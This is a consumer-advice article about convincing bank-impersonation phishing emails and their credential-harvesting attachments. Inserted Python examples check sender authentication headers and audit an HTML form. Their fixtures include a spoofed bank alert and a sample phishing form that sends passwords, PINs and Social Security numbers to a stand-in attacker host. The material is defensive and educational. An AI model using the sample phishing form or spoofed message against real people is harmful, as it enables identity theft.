Maybe you think you can spot scam emails by the broken English, the pleas to wire money via Western Union and the references to Nigerian princes. Think again. The latest phishing attacks are so well-crafted, they look exactly like emails you might receive from major banks like Wells Fargo and Bank of America, says Ondrej Krehel, information security officer at Identity Theft 911, Credit.com’s sister company.
“It’s very sophisticated,” Krehel says. “Hackers are creating these pages to look exactly like professionally crafted bank pages. So it does have the look and feel and touch of your bank’s website.”
One recent email was noteworthy simply because it managed to sneak past Identity Theft 911’s multiple firewalls and land in Krehel’s inbox. It appeared to come from Bank of America: the sender address was a genuine no-reply address at the bank’s own domain, not an obvious fake at Hotmail or Yahoo.com. That is less reassuring than it sounds. The From address on an email is written by whoever sends it and can be set to anything, so a real-looking sender proves nothing on its own; only the authentication checks the receiving mail server performs (SPF, DKIM and DMARC) say whether the bank’s systems actually sent the message.
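A way to check what the sender address actually proves, added here as an example and not part of the original article or of Identity Theft 911’s tooling: the script below parses a raw message with Python’s standard `email` module and compares the From domain against the envelope sender (Return-Path) and the SPF/DKIM/DMARC verdicts the receiving server recorded in its Authentication-Results header. The message is constructed for the example, with `bank.example` standing in for the impersonated bank and `attacker.example` for the real origin; the Authentication-Results parsing is simplified and assumes the usual `mechanism=result` layout.

```python
import email
import re
from email import policy

# Constructed sample: a message whose From: names the bank, but whose envelope
# sender and server-side verdicts tell a different story.
SAMPLE_EML = """\
Return-Path: <bounce-12@mailer.attacker.example>
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=mailer.attacker.example;
 dkim=none; dmarc=fail header.from=bank.example
From: "Bank Alerts" <no-reply@bank.example>
To: victim@example.net
Subject: Action required: verify your account
Content-Type: text/plain; charset=utf-8

There has been a problem with your account. Complete and return the attached form.
"""


def _domain(addr: str) -> str:
    """Return the lower-cased domain part of an address, or '' if there is none."""
    m = re.search(r"@([A-Za-z0-9.-]+)", addr or "")
    return m.group(1).lower() if m else ""


def check_sender(raw_message: str) -> dict:
    """Compare the sender-controlled From: header with the envelope sender and
    with the receiving server's SPF/DKIM/DMARC verdicts.

    Returns the extracted domains, the parsed verdicts and a list of flags;
    an empty flags list means nothing looked inconsistent."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    from_domain = _domain(str(msg.get("From", "")))
    return_path_domain = _domain(str(msg.get("Return-Path", "")))
    reply_to_domain = _domain(str(msg.get("Reply-To", "")))

    # Authentication-Results is written by the receiving server, not the
    # sender, so it is the one header the sender cannot simply type in.
    auth = str(msg.get("Authentication-Results", "") or "")
    verdicts = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        verdicts[mech] = m.group(1).lower() if m else "none"

    flags = []
    if return_path_domain and return_path_domain != from_domain:
        flags.append(f"envelope sender {return_path_domain} differs from From: {from_domain}")
    if reply_to_domain and reply_to_domain != from_domain:
        flags.append(f"Reply-To {reply_to_domain} differs from From: {from_domain}")
    for mech, result in verdicts.items():
        if result != "pass":
            flags.append(f"{mech}={result}")
    return {"from": from_domain, "return_path": return_path_domain,
            "verdicts": verdicts, "flags": flags}


if __name__ == "__main__":
    for flag in check_sender(SAMPLE_EML)["flags"]:
        print("FLAG:", flag)
```

A message that fails this check is not automatically a phish (misconfigured mailing lists fail too), but a bank alert whose envelope sender lives on a stranger’s domain and whose DMARC verdict is a fail deserves no benefit of the doubt, however convincing the From line looks in the mail client.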
Once opened, the email doesn’t deploy any malware to steal users’ passwords or snoop their computers (such malicious code would have been blocked by Krehel’s firewall). Instead, it informs the user that there’s been a serious problem with her account, and she needs to complete and return the attached form.
“The text of the email is very well crafted,” Krehel says. “It looks like something Bank of America would actually send you.”
The scammers didn’t even include any malware in the attachment, since that also would sound alarms within users’ anti-spyware programs. Instead, the attachment looks just like a page created by Bank of America itself.
The real Bank of America logo appears across the top of the file, and clicking on it takes the user to the bank’s actual site. That is part of the deception: a link to the genuine site says nothing about where the form sends the information typed into it. The color scheme, with red and grey horizontal ribbons, and numbers in blue circles, precisely mimics the look of all the bank’s other communications. Even the mix of input methods, with drop-down boxes, checkboxes and places to type in text, is crafted exactly like the real thing.
The hackers are so good, in fact, that they customize the attachments to different banks. Another attachment Krehel received a few months ago had the exact same level of detail, only it spoofed the look and feel of Wells Fargo’s website.
“This is about collecting users’ data, and not triggering any antivirus” software, Krehel says. “So it’s the user driving the action.”
The attachment asks users to input all the information about their accounts, including their passwords, PINs, birthdates, Social Security numbers, driver’s license numbers, and the maiden and middle name of their mothers, plus six different security challenge questions, such as “Your first pet’s name.”
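The attachment has to send the typed-in data somewhere. Assuming it is an ordinary HTML form (the article describes drop-downs, checkboxes and text fields but does not say how the form submits), the following added example, which is not from the article or from Identity Theft 911, walks an attachment with Python’s standard `html.parser`, lists where its links point and where its forms post, and flags a form whose action leaves the bank’s domain or whose fields ask for the kind of data the article lists. The sample attachment, the hostnames `bank.example` and `verify-account.attacker.example`, and the list of sensitive field-name fragments are all constructed for the example; a real check would also read the visible labels, since an attacker need not name fields descriptively.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name fragments a bank has no reason to collect through an e-mailed
# form. Assumption for this example: the fields carry descriptive names.
SENSITIVE_FRAGMENTS = ("pass", "pin", "ssn", "social", "maiden", "birth", "dob",
                       "license", "answer", "question", "middle")

# Constructed sample: the logo links to the real site, the form does not.
SAMPLE_ATTACHMENT = """\
<html><body>
<a href="https://www.bank.example/"><img src="logo.png" alt="Bank logo"></a>
<form method="post" action="https://verify-account.attacker.example/collect.php">
  Online ID: <input type="text" name="online_id">
  Passcode: <input type="password" name="passcode">
  ATM PIN: <input type="text" name="atm_pin">
  SSN: <input type="text" name="ssn">
  Mother's maiden name: <input type="text" name="mother_maiden">
  Security question 1: <select name="question1"><option>Your first pet's name</option></select>
  Answer: <input type="text" name="answer1">
  <input type="submit" value="Continue">
</form>
</body></html>
"""


class _FormWalker(HTMLParser):
    """Collect where links point, where forms submit, and which fields they ask for."""

    def __init__(self):
        super().__init__()
        self.link_hosts = set()
        self.form_actions = []
        self.field_names = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            host = urlparse(a["href"]).hostname
            if host:
                self.link_hosts.add(host.lower())
        elif tag == "form":
            # No action means the page submits to itself or via script;
            # record that explicitly so the caller can flag it.
            self.form_actions.append(a.get("action") or "(none)")
        elif tag in ("input", "select", "textarea") and a.get("name"):
            self.field_names.append(a["name"].lower())


def audit_attachment(html: str, expected_host: str) -> dict:
    """Audit an HTML attachment that claims to come from `expected_host`.

    The key check is the mismatch the article hints at: the logo may link to
    the real bank while the form posts the typed-in data somewhere else."""
    w = _FormWalker()
    w.feed(html)
    sensitive = [n for n in w.field_names if any(f in n for f in SENSITIVE_FRAGMENTS)]
    flags = []
    for action in w.form_actions:
        u = urlparse(action)
        if u.scheme == "mailto":
            flags.append(f"form e-mails its contents to {u.path}")
        elif action == "(none)" or not u.hostname:
            flags.append("form has no absolute action (submitted by script or relative URL)")
        elif not (u.hostname == expected_host or u.hostname.endswith("." + expected_host)):
            flags.append(f"form posts to {u.hostname}, not {expected_host}")
    if len(sensitive) >= 3:
        flags.append(f"{len(sensitive)} sensitive fields requested: {', '.join(sensitive)}")
    return {"link_hosts": sorted(w.link_hosts), "form_actions": w.form_actions,
            "sensitive_fields": sensitive, "flags": flags}


if __name__ == "__main__":
    for flag in audit_attachment(SAMPLE_ATTACHMENT, "bank.example")["flags"]:
        print("FLAG:", flag)
```

Run against the sample, the audit reports two things a user would never see from the rendered page: the data goes to a host that is not the bank’s, and the form asks for six secrets at once. Either finding on its own is enough to treat the attachment as hostile; the second is exactly the “overkill” clue Krehel describes below.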
This, actually, is one clue to figuring out that it’s a scam, Krehel says. Banks may occasionally ask customers to verify information about a certain transaction. If you’ve never been to Hong Kong but suddenly your credit card goes on a shopping spree there, you might get a phone call from Bank of America, or an email asking you to call the bank. But banks never, ever, ask customers to confirm the security details of their accounts via email.
“If they have a problem with the account itself, they’ll probably shut down the account entirely and call the person, or email them and ask them to call a secure number,” Krehel says.
Second, the sheer number of security questions should raise alarm bells in the user’s mind, Krehel says. The one purporting to be from Bank of America even asked for the user’s email password and their father’s middle name, information that Bank of America itself does not need to know.
“It’s just overkill, the number of questions asked in one email,” says Krehel.
The takeaway: Phishing scammers are getting a lot more sophisticated. Here are some tips to avoid getting scammed:
- Pay attention. We get so many emails these days, it’s easy to go into autopilot. As long as a message doesn’t look like an obvious fake, with pitches for Canadian Viagra or Nigerian princes, we’re likely to distractedly click on just about anything. But especially when an email says it’s from your bank or credit union, it’s time to stop zoning out and pay attention.
- Just because it looks and feels real doesn’t mean it is real. Scammers know how your bank crafts its communications. Be alert.
- Remember: Banks don’t ask customers to confirm account security details online. Ever. If you receive an email asking you to do this, it is—by definition!—a scam.
- It’s OK to do nothing. Never click “respond” to any emails you suspect may be fraudulent. Never open any attachments. Never press “Continue” or “Next” on any attachment. Any time you interact with a scammer, you increase your risk of getting scammed.
- Call your bank. If you have any questions at all, just call, using the number on the back of your card, on a statement, or on the bank’s own website, never a number printed in the email. Anyone at your local branch should be able to figure out whether the email you received was real or a scam.
- Report the phishing email by forwarding it, without responding to it or making any alterations, to: firstname.lastname@example.org.
- Ensure that your computer, smartphone, or browsing gadget is running security software, and that you keep it current by downloading all the latest updates.
- For more information, and an up-to-date listing of recent phishing attacks, check out Antiphishing.org. It’s a great educational resource.